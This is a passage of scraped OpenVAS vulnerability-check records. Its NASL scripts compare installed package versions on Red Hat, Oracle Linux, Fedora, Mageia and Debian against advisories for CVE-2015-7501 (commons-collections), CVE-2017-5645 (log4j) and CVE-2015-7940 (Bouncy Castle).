script_oid(\"1.3.6.1.4.1.25623.1.0.871511\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:14 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for apache-commons-collections RHSA-2015:2522-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Apache Commons Collections library\nprovides new interfaces, implementations, and utilities to extend the features\nof the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the linked references.\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"apache-commons-collections on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2522-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00071.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~22.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:01", "description": "Oracle Linux Local Security Checks ELSA-2015-2521", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2521", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122792", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2521.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122792\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-02 11:24:54 +0200 (Wed, 02 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2521\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2521 - jakarta-commons-collections security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2521\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2521.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-javadoc\", rpm:\"jakarta-commons-collections-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework\", rpm:\"jakarta-commons-collections-testframework~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework-javadoc\", rpm:\"jakarta-commons-collections-testframework-javadoc~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-tomcat5\", rpm:\"jakarta-commons-collections-tomcat5~3.2.1~3.5.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for jakarta-commons-collections RHSA-2015:2521-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871512\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:38 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Jakarta/Apache Commons Collections\nlibrary provides new interfaces, implementations, and utilities to extend the\nfeatures of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the references.\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"jakarta-commons-collections on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2521-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00070.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "openvas", "title": "Fedora Update for log4j12 FEDORA-2017-8348115acd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j12 FEDORA-2017-8348115acd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872759\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-13 13:16:33 +0200 (Tue, 13 Jun 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j12 FEDORA-2017-8348115acd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j12'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j12 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RS6LAXEJOL4LHVMUZYRNYICQN24X7PG6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j12\", rpm:\"log4j12~1.2.17~19.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "RedHat Update for log4j RHSA-2017:2423-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871877", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871877", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2423-01_log4j.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for log4j RHSA-2017:2423-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871877\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:19:05 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for log4j RHSA-2017:2423-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Log4j is a tool to help the programmer\noutput log statements to a variety of output targets.\n\nSecurity Fix(es):\n\n * It was found that when using remote logging with log4j socket server the\nlog4j server would deserialize any log event received via TCP or UDP. An\nattacker could use this flaw to send a specially crafted log event that,\nduring deserialization, would execute arbitrary code in the context of the\nlogger application. (CVE-2017-5645)\");\n script_tag(name:\"affected\", value:\"log4j on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2423-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00038.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~1.2.17~16.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "description": "Mageia Linux Local Security Checks mgasa-2015-0487", "cvss3": {}, "published": "2015-12-29T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0487", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310131170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0487.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131170\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-29 11:15:52 +0200 (Tue, 29 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0487\");\n script_tag(name:\"insight\", value:\"The Bouncy Castle Java library before 1.51 does not validate a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an invalid curve attack (CVE-2015-7940).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0487.html\");\n script_cve_id(\"CVE-2015-7940\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0487\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.50~3.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:09", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703417\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3417.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"bouncycastle on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name:\"summary\", value:\"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:53:16", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore 